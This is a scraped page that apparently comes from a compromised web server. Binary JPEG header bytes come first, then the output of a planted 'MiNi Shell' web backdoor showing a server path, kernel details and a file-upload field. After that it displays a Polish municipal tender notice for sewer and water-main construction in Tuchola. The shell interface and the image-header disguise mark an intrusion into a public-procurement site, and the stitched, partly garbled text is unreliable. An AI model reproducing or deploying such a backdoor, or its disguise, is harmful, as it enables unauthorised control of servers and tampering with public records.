JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250609/0026751201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa sieci kanalizacji sanitarnej grawitacyjnej oraz sieci wodociągowej rozdzielczej w ulicy Wincentego Witosa w Tucholi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Tuchola</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092351156</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">plac Zamkowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tuchola</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi212@tuchola.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.miasto.tuchola.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa sieci kanalizacji sanitarnej grawitacyjnej oraz sieci wodociągowej rozdzielczej w ulicy Wincentego Witosa w Tucholi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-43c9645b-b797-47ac-b6a3-92862cdca81e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00267512</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00022169/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.14 Budowa sieci kanalizacji sanitarnej grawitacyjnej oraz sieci wodociągowej rozdzielczej w ulicy Wincentego Witosa w Tucholi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> : https://platformazakupowa.pl/tuchola <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Adres strony internetowej, na której udostępniane będą zmiany i wyjaśnienia treści<br/>SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia.<br/>- strona internetowa prowadzonego postępowania dostępna pod adresem: https://platformazakupowa.pl/tuchola<br/>W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie pytań,<br/>ofert, zawiadomień, wyjaśnień oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia<br/>będą udostępniane na stronie internetowej zamawiającego: https://platformazakupowa.pl/tuchola (link Profilu Nabywcy).<br/>Szczegółowe informacje zawarto w rozdz. 5 SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5.8. Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (t.j.Dz. U. z 2020 r. poz.<br/>2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego<br/>z zegarem Głównego Urzędu Miar.<br/>5.9. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view<br/>5.10. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za<br/>ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony<br/>w art. 221 ustawy Pzp.<br/>(...)<br/>5.17. Treść zapytań wraz z wyjaśnieniami Zamawiający udostępnia, bez ujawniania źródła zapytania, na stronie internetowej<br/>prowadzonego postępowania https://platformazakupowa.pl/tuchola, w zakładce „Komunikaty publiczne”.<br/>5.18. Zalecenia Zamawiającego:Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne<br/>z załącznikiem nr 2 do „Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności,minimalnych wymagań dla<br/>rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań<br/>dla<br/>systemów<br/>teleinformatycznych”,<br/>zwanego dalej Rozporządzeniem KRI.<br/>5.19. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>5.20. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego<br/>z rozszerzeń:<br/>1) zip<br/>2) 7Z<br/>5.21. Wśród rozszerzeń powszechnych a niewystępujących w rozporządzeniu KRI występują:<br/>.rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>5.22. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi<br/>maksymalnie10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu<br/>osobistego, który wynosi maksymalnie 5MB.<br/>Szczegółowe informacje zawarto w rozdz. 5 SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/tuchola</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">25.1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Tuchola, w imieniu której działa Burmistrz Tucholi wykonujący prawem<br/>określone obowiązki z wykorzystaniem aparatu pomocniczego – Urzędu Miejskiego w Tucholi.<br/>Kontakt: plac Zamkowy 1,89-500 Tuchola, e-mail: burmistrz@tuchola.pl, tel. 52 564 25 00, fax.: 52 334 21 38.<br/>2) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonym w trybie podstawowym bez negocjacji.<br/>3) Odbiorcami Pani/Pana danych osobowych:<br/>- będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 oraz art. 253 Ustawy z<br/>dnia 11września 2019 r. Prawo zamówień publicznych (t.j. Dz.U. z 2024r. poz. 1320 z późn. zm.), dalej „ustawy Pzp”.<br/>- będą upoważnieni pracownicy Administratora Danych Osobowych,<br/>- mogą być podmioty upoważnione na podstawie przepisów prawa oraz podwykonawcy związani z Administratorem Danych<br/>umowami powierzenia przetwarzania danych osobowych.<br/>4) Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 i 4 ustawy Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia (a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy), a następnie według kategorii archiwalnej dokumentacji postępowania o<br/>udzielenie zamówienia.<br/>5) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>6) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO;<br/>7) W związku z jawnością postępowania o udzielenie zamówienia publicznego Pani/Pana dane osobowe mogą być przekazywane<br/>do państw poza EOG z zastrzeżeniem, o którym mowa w art. 18 ust. 5 Ustawy Pzp.<br/>8) Administrator danych osobowych będzie przetwarzał dane osobowe zebrane w postępowaniu o udzielenie zamówienia w sposób<br/>gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>9) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących *;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa; gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">10) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do usunięcia danych osobowych,<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO,<br/>11) w sprawach z zakresu ochrony danych osobowych można kontaktować się z Inspektorem Ochrony Danych, telefonicznie: 52<br/>336 34 33 lub pod adresem e-mail: iod@tuchola.pl<br/>* Wyjaśnienie: w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o<br/>którym mowa w art. 15 ust. 1-3 RODO, Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych<br/>informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.13.2025.AS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.2.	Przedmiotem niniejszej inwestycji jest budowa sieci wodociągowej rozdzielczej oraz grawitacyjnej sieci kanalizacji sanitarnej na terenie działek o nr ewid.: 1454/3, 1454/19, 1470/3, obręb Miasto Tuchola, jedn. ewid. Tuchola – Miasto. <br/>Długość łączna sieci kanalizacji sanitarnej wynosi 139,5 m. <br/>Całkowita długość sieci wodociągowej wynosi 178,00 m.<br/>W ramach niniejszego zadania przewiduje się:<br/>–	budowę sieci kanalizacji sanitarnej grawitacyjnej z rur PVC-U 200,9 mm o łącznej długości 138,50 m,<br/>–	budowę studni rewizyjnych betonowych DN1200 w ilości 5 szt.,<br/>–	budowę sieci wodociągowej rozdzielczej z rur PEHD PN10 SDR17 DN/OD 160/9,5 mm o łącznej długości L=178,00 m,<br/>–	budowę odejścia z rur PEHD PN10 SDR17 DN/OD 90/5,4 mm o dł. L=3,00 m, zasilającego hydrant nadziemny,<br/>–	budowę hydrantu nadziemnego DN80 – 1 szt.<br/>Szczegółowy opis przedmiotu zamówienia zawierają niżej wymienione dokumenty:<br/>–	Decyzja Starosty Tucholskiego nr 6.10.2025, z dnia 22 kwietnia 2025 r., znak BD.6740.6.10.2025.MP, w sprawie zatwierdzenia projektu zagospodarowania terenu i udzielenia pozwolenia na budowę sieci kanalizacji sanitarnej grawitacyjnej oraz sieci wodociągowej rozdzielczej, na terenie działek nr ewid. 1454/3, 1454/19, 1470/3 położonych w obrębie geodezyjnym miasto Tuchola, gmina Tuchola;<br/>–	PROJEKT ZAGOSPODAROWANIA TERENU – Budowa sieci wodociągowej rozdzielczej oraz grawitacyjnej sieci kanalizacji sanitarnej na terenie działek nr ewid. 1454/3, 1454/19, 1470/3, położonych w ob. ewid. Miasto Tuchola, jedn. ewid. Tuchola – Miasto,<br/>–	ZAŁĄCZNIKI PROJEKTU BUDOWLANEGO – Budowa sieci wodociągowej rozdzielczej oraz grawitacyjnej sieci kanalizacji sanitarnej na terenie działek nr ewid. 1454/3, 1454/19, 1470/3, położonych w ob. ewid. Miasto Tuchola, jedn. ewid. Tuchola – Miasto,<br/>–	SPECYFIKACJE TECHNICZNE WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH – Budowa sieci wodociągowej rozdzielczej oraz grawitacyjnej sieci kanalizacji sanitarnej na terenie działek nr ewid. 1454/3, 1454/19, 1470/3, położonych w ob. ewid. Miasto Tuchola, jedn. ewid. Tuchola – Miasto,<br/>–	WZÓR UMOWY.<br/>3.3.	Pomocniczo Zamawiający udostępnia Przedmiar – Budowa sieci wodociągowej rozdzielczej oraz grawitacyjnej sieci kanalizacji sanitarnej na terenie działek o nr ewid. 1454/3, 1454/19, 1470/3, położonych w ob. ewid. Miasto Tuchola, jedn. ewid. Tuchola – Miasto. Przedmiar robót stanowi kosztorys ofertowy służący do przygotowania oferty, który Wykonawca złoży najpóźniej w dniu podpisania umowy. Mimo, iż rozliczenie zadania jest ryczałtowe, Zamawiający wymaga, aby Wykonawca wybrany w niniejszym postępowaniu dostarczył kosztorys ofertowy i powykonawczy – na potrzeby rozliczenia inwestycji przez Zamawiającego, wraz z zakresem rzeczowym wykonanych robót.<br/>Z uwagi na dofinansowanie zadania ze środków Rządowego Funduszu Rozwoju Dróg, Zamawiający wymaga, aby Wykonawca wybrany w niniejszym postępowaniu przedstawił kosztorys ofertowy zgodnie z załączonymi do opisu przedmiotu zamówienia przedmiarami.<br/>Ewentualne zmiany, które wystąpią w kosztorysie powykonawczym, w stosunku do kosztorysu ofertowego, należy szczegółowo opisać w zakresie merytorycznym, obmiarowym i kosztowym.<br/>3.4.	Wykonawca zadania zobowiązany będzie dostarczyć (w 3 egz. papierowych) wpisaną do ewidencji materiałów państwowego zasobu geodezyjnego i kartograficznego dokumentację geodezyjną, zawierającą wyniki geodezyjnej inwentaryzacji powykonawczej oraz informację o zgodności usytuowania obiektu budowlanego z projektem zagospodarowania działki lub terenu, lub odstępstwach od tego projektu i ponieść wszelkie koszty z tym związane.<br/>3.5.	Wykonawca zobowiązany będzie opracować projekty organizacji ruchu na czas prowadzenia robót i uzyskać opinie, uzgodnienia i zezwolenia na ich wprowadzenie wraz z uzyskaniem zatwierdzenia od właściwego organu.<br/>3.6.	Wykonawca upoważniony zostanie do zawiadomienia Powiatowego Inspektora Nadzoru Budowlanego w Tucholi o zakończeniu budowy obiektu budowlanego oraz zobowiązany będzie uzyskać od niego zaświadczenie potwierdzające dopełnienie formalności związanych z zakończeniem budowy, lub zaświadczenie o braku wniesienia sprzeciwu do użytkowania obiektu budowlanego wybudowanego w ramach zadania będącego przedmiotem niniejszego zamówienia.<br/>3.7.	Wykonawca zobowiązany będzie opracować projekty organizacji ruchu na czas prowadzenia robót i uzyskać opinie, uzgodnienia i zezwolenia na ich wprowadzenie wraz z uzyskaniem zatwierdzenia od właściwego organu.<br/>3.8.	Wykonawca przed przystąpieniem do wykonywania robót:<br/>	najpóźniej w dniu przekazania terenu budowy, złoży wykaz osób oddelegowanych do realizacji zamówienia wraz z oświadczeniem o tym, że są zatrudnieni na podstawie umowy o pracę;<br/>	wskaże osoby funkcyjne budowy, wraz ze złożonymi przez nie oświadczeniami o podjęciu obowiązków kierownika budowy;<br/>	przedstawi Zamawiającemu szczegółową specyfikację materiałową wraz informacjami o wyrobach (deklaracjami zgodności), za wyjątkiem kostki brukowej i obrzeży – w celu zatwierdzenia przez inspektora nadzoru.<br/>3.9.	Zamawiający wymaga, by czynności bezpośrednio związane z realizacją robót budowlanych wykonywane były przez osoby zatrudnione przez Wykonawcę na podstawie umowy o pracę w rozumieniu ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (t.j. Dz. U. z 2025 r. poz. 277, z późn. zm.), o ile nie są one wykonywane przez dane osoby osobiście w ramach prowadzonej przez nie na podstawie wpisu do CEIDG działalności gospodarczej.<br/>Wymóg zatrudnienia na umowę o pracę nie dotyczy osób kierujących budową i robotami, osób wykonujących usługi projektowe, geodezyjne oraz osób świadczących usługi transportowe i sprzętowe. Obowiązek ten dotyczy także podwykonawców – Wykonawca jest zobowiązany zawrzeć w każdej umowie o podwykonawstwo stosowne zapisy zobowiązujące podwykonawców do zatrudnienia na umowę o pracę wszystkich osób wykonujących wskazane wyżej czynności. Zatrudnienie na podstawie umowy o pracę wyżej wymienionych osób powinno trwać nieprzerwanie przez cały okres trwania umowy.<br/>Wykonawca zobowiązany jest do przedłożenia Zamawiającemu w terminie określonym zapisami umowy (§ 10 – wzoru umowy) i aktualizowania na bieżąco, tj. za każdym razem, gdy dojdzie do zmiany personalnej, wykazu osób biorących udział w realizacji zamówienia zatrudnionych na podstawie umowy o pracę. Wykaz osób zatrudnionych na podstawie umowy o pracę biorących udział w realizacji zamówienia musi zawierać pełny skład pracowników wraz z określeniem pełnionych przez nich funkcji i wskazaniem okresu obowiązywania umowy o pracę.<br/>3.10. Wykonawca, który będzie realizował przedmiotową inwestycję, zobowiązany będzie udzielić<br/> Zamawiającemu minimum 36 miesiące gwarancji na wykonane roboty budowlane.<br/>3.11. Wykonawca zobowiązuje się do zrealizowania wszystkich robót zgodnie z dokumentacją projektową, zasadami wiedzy technicznej i obowiązującymi w Rzeczypospolitej Polskiej przepisami prawa powszechnie obowiązującego. Wszelkie zaistniałe wątpliwości Wykonawca powinien konsultować z Zamawiającym.<br/>3.12. Wykonawca wykona przedmiot zamówienia z materiałów własnych. Materiały te muszą odpowiadać wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie określonym w art. 10 ustawy Prawo budowlane. <br/> Wykonawca zobowiązuje się do stosowania podczas realizacji robót objętych niniejszą umową wyłącznie wyrobów i materiałów nowych w stanie kompletnym i nieuszkodzonym dopuszczonych do stosowania w budownictwie zgodnie z przepisami ustawy z dnia 7 lipca 1994 – Prawo 